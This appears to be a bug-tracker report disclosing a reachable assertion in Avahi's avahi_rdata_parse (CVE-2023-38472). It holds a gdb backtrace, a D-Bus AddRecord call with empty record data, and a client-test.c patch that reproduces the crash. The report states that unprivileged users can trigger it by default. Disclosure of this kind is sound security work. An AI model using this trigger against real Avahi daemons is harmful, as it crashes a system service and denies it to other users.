Reachable assertion in avahi_rdata_parse

[evverx]

dns.c:861: int avahi_rdata_parse(AvahiRecord *, const void *, size_t): Assertion `rdata' failed.

(gdb) bt
#0  0x00007ffff788ec0c in __pthread_kill_implementation () from /lib64/libc.so.6
#1  0x00007ffff783e986 in raise () from /lib64/libc.so.6
#2  0x00007ffff78287f4 in abort () from /lib64/libc.so.6
#3  0x00007ffff782871b in __assert_fail_base.cold () from /lib64/libc.so.6
#4  0x00007ffff7837536 in __assert_fail () from /lib64/libc.so.6
#5  0x00007ffff7eb1b68 in avahi_rdata_parse (record=0x6040000241d0, rdata=<optimized out>, size=<optimized out>) at dns.c:861
#6  0x000000000055837c in avahi_dbus_msg_entry_group_impl (c=0x612000001fc0, m=<optimized out>, userdata=<optimized out>) at dbus-entry-group.c:343
#7  0x00007ffff7cf3d11 in dbus_connection_dispatch () from /lib64/libdbus-1.so.3
#8  0x0000000000561f76 in dispatch_timeout_callback (t=t@entry=0x606000001dc0, userdata=0x603000002110) at ../avahi-common/dbus-watch-glue.c:105
#9  0x00007ffff7fa1c80 in timeout_callback (t=t@entry=0x606000001dc0) at simple-watch.c:447
#10 0x00007ffff7fa0d37 in avahi_simple_poll_dispatch (s=s@entry=0x60e000000120) at simple-watch.c:567
#11 0x00007ffff7fa1e7d in avahi_simple_poll_iterate (s=0x60e000000120, timeout=timeout@entry=-1) at simple-watch.c:605
#12 0x000000000051e503 in run_server (c=<optimized out>) at main.c:1268
#13 0x0000000000517bdf in main (argc=<optimized out>, argv=<optimized out>) at main.c:1686

It can be reproduced by calling something like

org.freedesktop.Avahi /Client*/EntryGroup* org.freedesktop.Avahi.EntryGroup AddRecord "iiusqquay" 0 0 0 '' 0 0 0 0

using

avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Test", 0x01, 0x10, 120, "", 0)

from inside a client creating EntryGroups. It can be triggered by unprivileged users unless disable-user-service-publishing is set to yes explicitly. By default it's set to no.

The easiest way to reproduce it would be to apply the following patch to client-test.c:

diff --git a/avahi-client/client-test.c b/avahi-client/client-test.c
index b3366d8..907c8be 100644
--- a/avahi-client/client-test.c
+++ b/avahi-client/client-test.c
@@ -256,7 +256,7 @@ int main (AVAHI_GCC_UNUSED int argc, AVAHI_GCC_UNUSED char *argv[]) {
     printf("Successfully created entry group %p\n", (void*) group);

     printf("%s\n", avahi_strerror(avahi_entry_group_add_service (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Lathiat's Site", "_http._tcp", NULL, NULL, 80, "foo=bar", NULL)));
-    printf("add_record: %d\n", avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "\5booya", 6));
+    printf("add_record: %d\n", avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "", 0));

     avahi_entry_group_commit (group);

build it, run avahi and then run the test.

[carnil]

CVE-2023-38472 is assigned for this issue.